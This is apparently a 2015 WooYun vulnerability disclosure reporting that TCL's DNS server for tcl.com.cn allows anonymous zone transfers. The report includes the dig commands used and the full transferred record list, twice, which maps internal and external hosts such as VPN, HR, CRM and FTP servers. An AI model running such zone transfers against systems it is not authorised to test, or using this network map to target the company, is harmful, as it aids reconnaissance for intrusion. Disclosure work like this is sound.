当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134083

漏洞标题:TCL DNS域传输信息泄漏

相关厂商:TCL集团财务有限公司

漏洞作者: 路人甲

提交时间:2015-08-14 15:49

修复时间:2015-08-19 15:50

公开时间:2015-08-19 15:50

漏洞类型:应用配置错误

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

DNS域传输导致任何匿名用户都可以获取DNS服务器某一域的所有记录,将整个企业的基础业务以及网络架构对外暴露从而造成严重的信息泄露,甚至导致企业网络被渗透。

详细说明:

1.

root@localhost:~# dig NS tcl.com.cn
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> NS tcl.com.cn
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26284
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;tcl.com.cn.			IN	NS
;; ANSWER SECTION:
tcl.com.cn.		3600	IN	NS	ns2.tcl.com.cn.
;; Query time: 162 msec
;; SERVER: 202.97.131.178#53(202.97.131.178)
;; WHEN: Thu Aug 13 22:41:33 2015
;; MSG SIZE  rcvd: 46
root@localhost:~# dig axfr @ns2.tcl.com.cn tcl.com.cn
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> axfr @ns2.tcl.com.cn tcl.com.cn
; (2 servers found)
;; global options: +cmd
tcl.com.cn.		3600	IN	SOA	ns2.tcl.com.cn. root.ns2.tcl.com.cn. 42 172800 14400 21600 3600
tcl.com.cn.		3600	IN	NS	ns2.tcl.com.cn.
ap.tcl.com.cn.		3600	IN	A	10.1.1.166
bc.tcl.com.cn.		3600	IN	A	218.14.88.16
bi.tcl.com.cn.		3600	IN	A	10.3.3.177
bmskoyoo.tcl.com.cn.	3600	IN	A	218.106.129.26
bmsreport.tcl.com.cn.	3600	IN	A	218.106.129.55
bmswp.tcl.com.cn.	3600	IN	A	218.106.129.25
bmswpreport.tcl.com.cn.	3600	IN	A	218.106.129.17
ccsreport.tcl.com.cn.	3600	IN	A	218.106.129.12
ccst.tcl.com.cn.	3600	IN	A	125.88.10.253
chinaidea.tcl.com.cn.	3600	IN	A	58.215.140.4
club.tcl.com.cn.	3600	IN	A	10.1.1.81
connmgr01.tcl.com.cn.	3600	IN	A	10.1.128.197
connmgr02.tcl.com.cn.	3600	IN	A	10.1.128.196
connmgr03.tcl.com.cn.	3600	IN	A	10.1.128.194
crm.tcl.com.cn.		3600	IN	A	218.106.129.5
crmreport.tcl.com.cn.	3600	IN	A	218.106.129.41
diaocha.tcl.com.cn.	3600	IN	A	59.33.249.49
e.tcl.com.cn.		3600	IN	A	218.106.129.60
ego.tcl.com.cn.		3600	IN	A	218.106.129.52
files.tcl.com.cn.	3600	IN	A	218.106.129.18
fis.tcl.com.cn.		3600	IN	A	218.106.129.50
ftp.tcl.com.cn.		3600	IN	A	10.1.128.190
gis.tcl.com.cn.		3600	IN	A	218.106.129.51
hr.tcl.com.cn.		3600	IN	A	125.88.10.238
icescreen.tcl.com.cn.	3600	IN	A	219.239.90.108
koyooreport.tcl.com.cn.	3600	IN	A	218.106.129.26
mall.tcl.com.cn.	3600	IN	A	58.215.140.10
mclub.tcl.com.cn.	3600	IN	A	219.239.90.90
meeting.tcl.com.cn.	3600	IN	A	218.106.129.32
melodycrmrep.tcl.com.cn. 3600	IN	A	218.106.129.48
ns1.tcl.com.cn.		3600	IN	A	218.106.133.131
ns2.tcl.com.cn.		3600	IN	A	58.252.192.36
ns2.tcl.com.cn.		3600	IN	A	218.14.88.10
oat.tcl.com.cn.		3600	IN	A	125.88.10.254
phone.tcl.com.cn.	3600	IN	A	218.106.129.33
phone-app.tcl.com.cn.	3600	IN	A	125.88.10.236
pm.tcl.com.cn.		3600	IN	A	10.1.3.230
redmine.tcl.com.cn.	3600	IN	A	125.88.10.242
saleshop.tcl.com.cn.	3600	IN	A	218.106.129.33
sim.tcl.com.cn.		3600	IN	A	59.33.249.49
sms.tcl.com.cn.		3600	IN	A	10.3.3.168
sslvpn.tcl.com.cn.	3600	IN	A	218.106.129.22
svc.tcl.com.cn.		3600	IN	A	218.106.129.59
tcltest.tcl.com.cn.	3600	IN	A	125.88.10.249
testchat.tcl.com.cn.	3600	IN	A	125.88.10.239
train.tcl.com.cn.	3600	IN	A	218.106.129.27
train2.tcl.com.cn.	3600	IN	A	218.106.129.38
train22.tcl.com.cn.	3600	IN	A	218.106.129.39
train42.tcl.com.cn.	3600	IN	A	218.106.129.27
train99.tcl.com.cn.	3600	IN	A	218.106.129.54
tvs.tcl.com.cn.		3600	IN	A	218.106.129.23
vdi.tcl.com.cn.		3600	IN	A	10.1.128.32
vod.tcl.com.cn.		3600	IN	A	10.1.3.40
voip.tcl.com.cn.	3600	IN	A	218.106.129.52
vpn.tcl.com.cn.		3600	IN	A	218.106.129.56
wechat.tcl.com.cn.	3600	IN	A	218.106.129.23
weixin.tcl.com.cn.	3600	IN	A	218.106.254.90
weixintest.tcl.com.cn.	3600	IN	A	125.88.10.245
www.tcl.com.cn.		3600	IN	A	58.252.192.36
www.tcl.com.cn.		3600	IN	A	125.93.53.7
wx.tcl.com.cn.		3600	IN	A	125.88.10.244
yeah.tcl.com.cn.	3600	IN	A	218.106.129.51
yun.tcl.com.cn.		3600	IN	A	218.106.129.19
yunclient.tcl.com.cn.	3600	IN	A	218.106.129.18
tcl.com.cn.		3600	IN	SOA	ns2.tcl.com.cn. root.ns2.tcl.com.cn. 42 172800 14400 21600 3600
;; Query time: 155 msec
;; SERVER: 218.14.88.10#53(218.14.88.10)
;; WHEN: Thu Aug 13 22:42:49 2015
;; XFR size: 67 records (messages 1, bytes 1545)

漏洞证明:

tcl.com.cn.		3600	IN	SOA	ns2.tcl.com.cn. root.ns2.tcl.com.cn. 42 172800 14400 21600 3600
tcl.com.cn.		3600	IN	NS	ns2.tcl.com.cn.
ap.tcl.com.cn.		3600	IN	A	10.1.1.166
bc.tcl.com.cn.		3600	IN	A	218.14.88.16
bi.tcl.com.cn.		3600	IN	A	10.3.3.177
bmskoyoo.tcl.com.cn.	3600	IN	A	218.106.129.26
bmsreport.tcl.com.cn.	3600	IN	A	218.106.129.55
bmswp.tcl.com.cn.	3600	IN	A	218.106.129.25
bmswpreport.tcl.com.cn.	3600	IN	A	218.106.129.17
ccsreport.tcl.com.cn.	3600	IN	A	218.106.129.12
ccst.tcl.com.cn.	3600	IN	A	125.88.10.253
chinaidea.tcl.com.cn.	3600	IN	A	58.215.140.4
club.tcl.com.cn.	3600	IN	A	10.1.1.81
connmgr01.tcl.com.cn.	3600	IN	A	10.1.128.197
connmgr02.tcl.com.cn.	3600	IN	A	10.1.128.196
connmgr03.tcl.com.cn.	3600	IN	A	10.1.128.194
crm.tcl.com.cn.		3600	IN	A	218.106.129.5
crmreport.tcl.com.cn.	3600	IN	A	218.106.129.41
diaocha.tcl.com.cn.	3600	IN	A	59.33.249.49
e.tcl.com.cn.		3600	IN	A	218.106.129.60
ego.tcl.com.cn.		3600	IN	A	218.106.129.52
files.tcl.com.cn.	3600	IN	A	218.106.129.18
fis.tcl.com.cn.		3600	IN	A	218.106.129.50
ftp.tcl.com.cn.		3600	IN	A	10.1.128.190
gis.tcl.com.cn.		3600	IN	A	218.106.129.51
hr.tcl.com.cn.		3600	IN	A	125.88.10.238
icescreen.tcl.com.cn.	3600	IN	A	219.239.90.108
koyooreport.tcl.com.cn.	3600	IN	A	218.106.129.26
mall.tcl.com.cn.	3600	IN	A	58.215.140.10
mclub.tcl.com.cn.	3600	IN	A	219.239.90.90
meeting.tcl.com.cn.	3600	IN	A	218.106.129.32
melodycrmrep.tcl.com.cn. 3600	IN	A	218.106.129.48
ns1.tcl.com.cn.		3600	IN	A	218.106.133.131
ns2.tcl.com.cn.		3600	IN	A	58.252.192.36
ns2.tcl.com.cn.		3600	IN	A	218.14.88.10
oat.tcl.com.cn.		3600	IN	A	125.88.10.254
phone.tcl.com.cn.	3600	IN	A	218.106.129.33
phone-app.tcl.com.cn.	3600	IN	A	125.88.10.236
pm.tcl.com.cn.		3600	IN	A	10.1.3.230
redmine.tcl.com.cn.	3600	IN	A	125.88.10.242
saleshop.tcl.com.cn.	3600	IN	A	218.106.129.33
sim.tcl.com.cn.		3600	IN	A	59.33.249.49
sms.tcl.com.cn.		3600	IN	A	10.3.3.168
sslvpn.tcl.com.cn.	3600	IN	A	218.106.129.22
svc.tcl.com.cn.		3600	IN	A	218.106.129.59
tcltest.tcl.com.cn.	3600	IN	A	125.88.10.249
testchat.tcl.com.cn.	3600	IN	A	125.88.10.239
train.tcl.com.cn.	3600	IN	A	218.106.129.27
train2.tcl.com.cn.	3600	IN	A	218.106.129.38
train22.tcl.com.cn.	3600	IN	A	218.106.129.39
train42.tcl.com.cn.	3600	IN	A	218.106.129.27
train99.tcl.com.cn.	3600	IN	A	218.106.129.54
tvs.tcl.com.cn.		3600	IN	A	218.106.129.23
vdi.tcl.com.cn.		3600	IN	A	10.1.128.32
vod.tcl.com.cn.		3600	IN	A	10.1.3.40
voip.tcl.com.cn.	3600	IN	A	218.106.129.52
vpn.tcl.com.cn.		3600	IN	A	218.106.129.56
wechat.tcl.com.cn.	3600	IN	A	218.106.129.23
weixin.tcl.com.cn.	3600	IN	A	218.106.254.90
weixintest.tcl.com.cn.	3600	IN	A	125.88.10.245
www.tcl.com.cn.		3600	IN	A	58.252.192.36
www.tcl.com.cn.		3600	IN	A	125.93.53.7
wx.tcl.com.cn.		3600	IN	A	125.88.10.244
yeah.tcl.com.cn.	3600	IN	A	218.106.129.51
yun.tcl.com.cn.		3600	IN	A	218.106.129.19
yunclient.tcl.com.cn.	3600	IN	A	218.106.129.18

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-19 15:50

厂商回复:

最新状态:

暂无